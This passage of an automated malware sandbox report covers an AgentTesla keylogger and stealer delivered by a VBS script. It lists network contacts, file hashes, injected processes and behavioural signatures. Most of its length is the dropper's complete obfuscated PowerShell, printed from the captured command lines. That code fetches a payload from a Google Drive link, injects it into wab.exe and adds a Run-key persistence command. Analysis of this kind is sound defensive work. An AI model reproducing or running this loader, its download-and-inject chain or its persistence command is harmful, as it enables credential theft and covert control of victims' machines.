ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
GB 142.250.187.238:443 drive.google.com tcp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 5c220ed75280c181214fd09e1eed5be5
SHA1 8632a068505754d734915e2cdb4b23fca1324e3b
SHA256 2c372644fac0b493dc938395727bcb7a2913955dbacbf50b577114ca63e73088
SHA512 5422ee3ea40a6d1d9bd3617bc42fc6dbd9589f57e04bb72fa5518df5e64232ccc20ccb0a03b233770537feaffab1070491efd01c42f54f60a63b14da57e1c69a

memory/916-346-0x000007FEF5CFE000-0x000007FEF5CFF000-memory.dmp

memory/916-349-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/916-348-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-347-0x000000001B560000-0x000000001B842000-memory.dmp

memory/916-350-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-352-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-351-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-353-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YZGRX9C61X669HDJJLQ6.temp

MD5 2d98cb939b6fccc0c0b74478f518ba8d
SHA1 11902caa2dcc93e39cb0d8e3a059426ac2ff2962
SHA256 78edc4b662409c595c12f41e08fd6eafc4a1a1fd822e3bb9f161e1c9f8ce7a7d
SHA512 962538a76666473f0586740dcb2a8369ad5d810da161f7a15969e189e67dafbbe53c5eda80114301e3b174f781cd3de852d50fa3a76e9e609faad4f5a7d65f52

C:\Users\Admin\AppData\Roaming\Restauratrens.Alb

MD5 c990e3d829b26e351547c77df1bc5953
SHA1 df0592b47bea01cc3199012205c3bf55545fb09e
SHA256 f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822
SHA512 f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da

memory/1700-359-0x0000000006830000-0x0000000009F8A000-memory.dmp

memory/916-360-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/916-361-0x000007FEF5CFE000-0x000007FEF5CFF000-memory.dmp

memory/2784-382-0x0000000000220000-0x0000000001282000-memory.dmp

memory/916-383-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

memory/2784-384-0x0000000000220000-0x0000000000262000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 14:56

Reported

2024-06-19 14:59

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4232 set thread context of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3452 wrote to memory of 1284 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3452 wrote to memory of 1284 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 3420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 3420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 4232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 4232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4232 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4232 wrote to memory of 3412 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3412 wrote to memory of 3312 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 3312 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 3312 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3312 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3312 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3312 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ 